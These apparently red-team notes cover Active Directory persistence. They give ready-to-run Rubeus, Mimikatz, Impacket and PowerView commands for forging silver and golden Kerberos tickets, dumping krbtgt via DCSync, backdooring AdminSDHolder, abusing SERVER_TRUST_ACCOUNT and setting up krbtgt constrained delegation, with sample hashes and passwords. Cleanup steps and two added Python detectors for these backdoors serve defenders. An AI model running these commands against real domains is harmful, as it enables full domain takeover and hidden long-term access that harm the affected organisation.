Dominance

Silver Ticket

Rubeus
Cmd > Rubeus.exe s4u /domain:megacorp.local /dc:dc1.megacorp.local /user:SRV01$ /rc4:fc525c9683e8fe067095ba2ddc971889 /altservice:http/srv01.megacorp.local /impersonateuser:Administrator /self /ptt
Impacket
$ getST.py megacorp.local/'SRV01$' -hashes :fc525c9683e8fe067095ba2ddc971889 -dc-ip 192.168.1.11 -spn ldap/srv01.megacorp.local -impersonate 'Administrator'

Golden Ticket

Mimikatz
Cmd > .\mimikatz.exe "kerberos::golden /domain:megacorp.local /user:snovvcrash /sid:<SID> /krbtgt:<NTHASH> /ptt [/startoffset:-10 /endin:60 /renewmax:10080]" "exit"
Cmd > .\mimikatz.exe "lsadump::dcsync /user:megacorp.local\krbtgt /domain:megacorp.local" "exit"
Impacket
$ ticketer.py -nthash 00ff00ff00ff00ff00ff00ff00ff00ff -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -domain megacorp.local snovvcrash
$ export KRB5CCNAME=`readlink -f snovvcrash.ccache`
$ psexec.py megacorp.local/snovvcrash@<DC_FQDN> -k -no-pass
$ secretsdump.py megacorp.local/snovvcrash@<DC_FQDN> -dc-ip 10.10.13.37 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass

Diamond Ticket

AdminSDHolder Modification

Create a Backdoor

Add a new domain user or grant an existing user GenericAll permissions on the AdminSDHolder container:
PV3 > Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -TargetDomain megacorp.local -PrincipalIdentity snovvcrash -PrincipalDomain megacorp.local -Rights All -Verbose
Check that granting AdminSDHolder permissions was successful (may take 60+ minutes for the security ACLs to get updated for that user):
PV3 > Get-DomainUser snovvcrash | select objectsid
S-1-5-21-2284550090-1208917427-1204316795-9824
PV3 > Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
AceType : AccessAllowed
ObjectDN : CN=AdminSDHolder,CN=System,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID :
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
Now you can add yourself (the "snovvcrash" user) to the Domain Admins group at any time and act accordingly (actually, adding the user to Domain Admins every time is not necessary, because the AdminCount attribute stays 1 after the backdoor user has been added to a protected group once):
PV3 > Add-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainObjectAcl -Identity "Domain Admins" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2284550090-1208917427-1204316795-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
PV3 > Remove-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainUser snovvcrash | select admincount
admincount
----------
1
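A defender's check for the backdoor created above, added here as an example (not part of the original notes): it walks the AdminSDHolder ACEs, decodes the access mask (983551 is GenericAll) and reports write-class rights held by any principal outside a trusted set. The input records are constructed to mirror the Get-DomainObjectAcl output above, and the trusted-principal set is an assumption to adjust per environment.

```python
# Added example, not from the original notes: audit the AdminSDHolder DACL for
# write-class ACEs held by principals that should not be there. Input records are
# constructed dicts shaped like PowerView's Get-DomainObjectAcl output above.

# Write-class bits of the AD access mask (ActiveDirectoryRights enumeration)
WRITE_RIGHTS = {
    0x00008: "Self",
    0x00020: "WriteProperty",
    0x00100: "ExtendedRight",
    0x10000: "Delete",
    0x40000: "WriteDacl",
    0x80000: "WriteOwner",
}
GENERIC_ALL = 0xF01FF  # 983551, the AccessMask PowerView printed for the backdoor ACE


def decode_mask(mask):
    """Return the write-class rights present in an access mask (GenericAll if all set)."""
    if mask & GENERIC_ALL == GENERIC_ALL:
        return ["GenericAll"]
    return [name for bit, name in WRITE_RIGHTS.items() if mask & bit]


def audit_adminsdholder(aces, domain_sid, extra_trusted=()):
    """List (SID, rights) for allow ACEs that grant write rights to untrusted principals.
    domain_sid: the domain SID prefix, used to derive the Domain/Enterprise Admins SIDs.
    extra_trusted: SIDs the organisation has knowingly delegated (assumed empty by default).
    """
    trusted = {f"{domain_sid}-512", f"{domain_sid}-519",  # Domain Admins, Enterprise Admins
               "S-1-5-32-544", "S-1-5-18", *extra_trusted}  # BUILTIN\Administrators, SYSTEM
    findings = []
    for ace in aces:
        rights = decode_mask(int(ace["AccessMask"]))
        if ace["AceType"] == "AccessAllowed" and rights and ace["SecurityIdentifier"] not in trusted:
            findings.append((ace["SecurityIdentifier"], rights))
    return findings


# Constructed sample mirroring the PowerView output in the notes above
DOMAIN_SID = "S-1-5-21-2284550090-1208917427-1204316795"
SAMPLE_ACES = [
    {"AceType": "AccessAllowed", "SecurityIdentifier": f"{DOMAIN_SID}-512", "AccessMask": 983551},
    {"AceType": "AccessAllowed", "SecurityIdentifier": "S-1-5-11", "AccessMask": 0x20094},  # read-only
    {"AceType": "AccessAllowed", "SecurityIdentifier": f"{DOMAIN_SID}-9824", "AccessMask": 983551},  # backdoor
]

if __name__ == "__main__":
    for sid, rights in audit_adminsdholder(SAMPLE_ACES, DOMAIN_SID):
        print(f"ALERT: {sid} holds {','.join(rights)} on AdminSDHolder")
```

Run it periodically against the live DACL (e.g. from Get-DomainObjectAcl output converted to JSON) and treat any new finding as an incident, since legitimate changes to AdminSDHolder are rare.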

Remove the Backdoor

Disable or remove the account (if a new user was created):
PS > net user snovvcrash /domain /active:no
PS > net user snovvcrash /domain /del
Remove the user's ACE from the AdminSDHolder container via GUI (ADUC, dsa.msc).
Clear the AdminCount attribute (it will be reset if the user is still protected via AdminSDHolder):
PV3 > Set-DomainObject -Identity snovvcrash -Domain megacorp.local -Clear admincount -Verbose
Or
PS > Get-ADUser snovvcrash | Set-ADObject -Clear admincount
Fix the inheritance rules:
PS > [bool]$isProtected = $false
PS > [bool]$PreserveInheritance = $true
PS > [string]$dn = (Get-ADUser snovvcrash).DistinguishedName
PS > $user = [ADSI]"LDAP://$dn"
PS > $acl = $user.objectSecurity
PS > $acl.AreAccessRulesProtected
True # proceed if True
PS > $acl.SetAccessRuleProtection($isProtected, $PreserveInheritance)
PS > $inherited = $acl.AreAccessRulesProtected
PS > $user.commitchanges()
PS > $acl.AreAccessRulesProtected
False

SERVER_TRUST_ACCOUNT

When DA is owned (or any other account with the DS-Install-Replica permission), you can create a fake machine account (or use an existing real machine account), set the SERVER_TRUST_ACCOUNT bit on it and perform DCSync on behalf of this account to regain domain dominance.
1. Create a fake machine account:
PM > New-MachineAccount -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
name primarygroupid useraccountcontrol
---- -------------- ------------------
FakeMachine 515 WORKSTATION_TRUST_ACCOUNT
2. Set the SERVER_TRUST_ACCOUNT bit:
PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=8192}
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
name primarygroupid useraccountcontrol
---- -------------- ------------------
FakeMachine 516 SERVER_TRUST_ACCOUNT
3. Perform DCSync:
$ secretsdump.py MEGACORP/'FakeMachine$:Passw0rd!'@DC01.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt'
4. Cleanup:
PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=4096}
Or
PM > Remove-MachineAccount -MachineAccount FakeMachine

KRBTGT Constrained Delegation

Windows
# create a new service account (or abuse an existing one)
PM > New-MachineAccount -Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force) -Verbose
# set UAC to 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=16781312} -Verbose
# set the krbtgt SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{"msDS-AllowedToDelegateTo"=@("krbtgt/MEGACORP")} -Verbose
# request TGS via S4U (will act as a TGT of the impersonated user)
PS > .\Rubeus.exe s4u /domain:megacorp.local /user:FakeMachine$ /rc4:b2bdbe60565b677dfb133866722317fd /impersonateuser:snovvcrash /msdsspn:krbtgt/MEGACORP /ptt
# cleanup: remove the SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Clear msDS-AllowedToDelegateTo -Verbose
# cleanup: back to UAC 'WORKSTATION_TRUST_ACCOUNT'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=4096} -Verbose
Linux
# create a new service account (or abuse an existing one)
$ addcomputer.py -computer-name Persist1 -computer-pass 'Passw0rd1!' -dc-ip 192.168.1.11 megacorp.local/lowpriv:'Passw0rd2!'
# set UAC to 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION' and set the krbtgt SPN for delegation
$ python3 setCD.py megacorp.local/administrator:'Passw0rd3!' -dc-ip 192.168.1.11 -target 'Persist1$' -spn krbtgt/MEGACORP
# request TGS via S4U (will act as a TGT of the impersonated user)
$ getST.py -spn krbtgt/MEGACORP megacorp.local/'Persist1$:Passw0rd1!' -dc-ip 192.168.1.11 -impersonate 'DC01$'
# fire DCSync
$ KRB5CCNAME=`pwd`/'DC01$.ccache' secretsdump.py DC01.megacorp.local -dc-ip 192.168.1.11 -k -no-pass -just-dc
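A detection that covers both the SERVER_TRUST_ACCOUNT and the KRBTGT constrained delegation persistence above, added here as an example (not part of the original notes): it checks every computer object for a SERVER_TRUST_ACCOUNT bit outside the Domain Controllers OU, a primaryGroupID that disagrees with that bit, and an msDS-AllowedToDelegateTo entry pointing at krbtgt. The objects are constructed dicts using the UAC values and SPN from the steps above; in practice they would come from an LDAP query.

```python
# Added example, not from the original notes: flag computer objects that look like
# the SERVER_TRUST_ACCOUNT and krbtgt-delegation persistence described above. Input
# records are constructed dicts with the LDAP attribute names as keys.

# userAccountControl bits (MS-ADTS) and the Domain Controllers group RID
SERVER_TRUST_ACCOUNT = 0x2000               # 8192 in the notes above
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # 16781312 == this | WORKSTATION_TRUST_ACCOUNT
DOMAIN_CONTROLLERS_RID = 516


def audit_computer(obj):
    """Return the reasons a computer object is suspicious (empty list = clean)."""
    reasons = []
    uac = int(obj["userAccountControl"])
    is_server_trust = bool(uac & SERVER_TRUST_ACCOUNT)
    in_dc_ou = ",ou=domain controllers," in obj["distinguishedName"].lower()
    # A DC-class account outside the Domain Controllers OU can DCSync (fake DC)
    if is_server_trust and not in_dc_ou:
        reasons.append("SERVER_TRUST_ACCOUNT set on a non-DC object")
    # The DC keeps primaryGroupID 516 in step with the bit; a mismatch means manual edits
    if (obj["primaryGroupID"] == DOMAIN_CONTROLLERS_RID) != is_server_trust:
        reasons.append("primaryGroupID and SERVER_TRUST_ACCOUNT disagree")
    # Constrained delegation to krbtgt lets the account obtain TGTs for any user
    targets = [s.lower() for s in obj.get("msDS-AllowedToDelegateTo", [])]
    if any(t.startswith("krbtgt/") for t in targets):
        why = "msDS-AllowedToDelegateTo targets krbtgt"
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            why += " with protocol transition enabled"
        reasons.append(why)
    return reasons


def audit_domain(objects):
    """Map sAMAccountName -> reasons for every object that tripped a rule."""
    return {o["sAMAccountName"]: r for o in objects if (r := audit_computer(o))}


# Constructed samples: a real DC plus the two persistence accounts the notes create
BASE = "DC=megacorp,DC=local"
SAMPLE = [
    {"sAMAccountName": "DC01$", "distinguishedName": f"CN=DC01,OU=Domain Controllers,{BASE}",
     "userAccountControl": 0x82000, "primaryGroupID": 516, "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "FakeMachine$", "distinguishedName": f"CN=FakeMachine,CN=Computers,{BASE}",
     "userAccountControl": 8192, "primaryGroupID": 516, "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "Persist1$", "distinguishedName": f"CN=Persist1,CN=Computers,{BASE}",
     "userAccountControl": 16781312, "primaryGroupID": 515, "msDS-AllowedToDelegateTo": ["krbtgt/MEGACORP"]},
]

if __name__ == "__main__":
    for name, reasons in audit_domain(SAMPLE).items():
        print(f"ALERT {name}: " + "; ".join(reasons))
```

The same attributes are what to baseline and alert on in directory change auditing (event ID 4742 / 5136 for userAccountControl and msDS-AllowedToDelegateTo changes), since the cleanup steps above deliberately revert them to clean-looking values.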